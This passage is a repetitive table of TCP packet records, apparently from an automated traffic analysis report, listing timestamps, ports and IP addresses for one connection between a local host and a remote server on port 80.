                        Sep 25, 2024 16:03:23.253061056 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.253077030 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253087044 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.253087044 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253098965 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253109932 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253110886 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.253122091 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253133059 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253142118 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.253144026 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253156900 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253166914 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.253170013 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253181934 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253192902 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.253192902 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253205061 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253205061 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.253215075 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253235102 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253237009 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.253245115 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253257036 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253257036 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.253268003 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253279924 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253281116 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.253290892 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253303051 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253314018 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.253314018 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253314018 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.253326893 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253338099 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253379107 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.253458977 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253469944 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253484011 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253520966 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253524065 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.253531933 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253542900 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253562927 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253565073 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.253583908 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.253679991 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253691912 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253704071 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253715992 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253722906 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.253726006 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253737926 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253746986 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.253750086 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253761053 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253772020 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253777981 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.253783941 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.253803968 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.253820896 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.260344028 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.340111017 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340128899 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340138912 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340178967 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340181112 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.340189934 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340223074 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340234041 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340241909 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.340246916 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340269089 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340274096 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.340281963 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340286016 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.340292931 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340305090 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340315104 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340327978 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340332985 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.340338945 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340351105 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.340353012 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340375900 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.340384960 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.340464115 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340476036 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340487003 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340500116 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340509892 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.340512037 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340523958 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340529919 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.340536118 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340548992 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340557098 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.340576887 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.340603113 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340614080 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340626001 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340656996 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.340694904 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340718985 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340727091 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.340730906 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340744019 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340755939 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340763092 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.340785027 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.340807915 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340823889 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340835094 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340845108 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340857029 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.340876102 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.340903044 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.341016054 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341031075 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341042995 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341053009 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341061115 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.341065884 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341077089 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341088057 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.341097116 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341108084 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341114998 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.341120005 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341130972 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.341131926 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341151953 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341159105 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.341162920 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341173887 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341187000 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.341190100 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341211081 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341223001 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.341228962 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341239929 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341244936 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341247082 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.341253996 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341263056 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341268063 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341273069 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341278076 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341283083 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341288090 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341294050 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341305017 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.341305017 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341311932 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341322899 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341336966 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.341336966 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341350079 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341362000 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.341378927 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.341449976 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341461897 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341473103 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341483116 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341496944 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341504097 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.341531038 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.341552973 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341563940 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341573954 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341583014 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.341587067 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341598988 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341609001 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.341610909 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341623068 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341634035 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341645002 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.341648102 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341658115 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341661930 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.341670036 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341687918 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.341707945 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341711044 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.341717958 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341727972 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341741085 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341746092 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.341770887 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.341811895 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341824055 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341842890 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341855049 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341866016 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341871023 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.341877937 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341890097 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341907024 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.341938972 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341949940 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341959953 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341968060 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.341972113 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.341993093 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.342103004 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.342113018 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.342124939 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.342130899 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.342145920 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.342156887 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.342156887 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.342168093 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.342179060 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.342185020 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.342190027 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.342200994 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.342209101 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.342214108 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.342227936 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.342233896 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.342247009 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.342257023 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.342257977 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.342267990 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.342287064 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.342291117 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.342295885 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.342314959 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.352221966 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.428644896 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.428673029 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.428710938 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.428739071 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.428757906 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.428772926 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.428776026 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.428772926 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.428805113 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.428824902 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.428842068 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.428852081 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.428852081 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.428860903 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.428886890 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.428915977 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.428946018 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.428946018 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.428946972 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.428966045 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.428983927 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429003000 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429030895 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.429030895 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.429032087 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429064989 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429090977 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429106951 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429124117 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429133892 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.429133892 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.429155111 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429187059 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429203033 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429229975 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.429229975 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.429231882 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429250002 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429267883 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429292917 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429321051 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.429321051 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.429322958 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429342985 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429362059 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429399967 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429416895 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429426908 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.429426908 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.429441929 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429470062 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429490089 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429506063 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429519892 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.429519892 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.429523945 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429559946 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429577112 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429605007 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.429605007 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.429606915 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429626942 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429653883 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429671049 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429699898 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.429699898 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.429702044 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429718018 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429735899 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429752111 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429768085 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429781914 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.429781914 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.429795980 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429821968 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429837942 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429858923 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429867029 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.429867029 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.429879904 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429898024 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429945946 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429974079 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.429976940 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.429976940 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.429992914 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430011034 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430027008 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430049896 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430056095 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.430056095 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.430099964 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430131912 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430147886 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430166006 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430174112 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.430174112 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.430185080 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430202007 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430218935 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430236101 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430247068 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.430247068 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.430265903 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430285931 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430301905 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430316925 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430325985 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430346012 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430350065 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.430350065 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.430356979 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430366993 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.430367947 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430380106 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430393934 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430403948 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430414915 CEST8049715172.94.3.25192.168.2.6
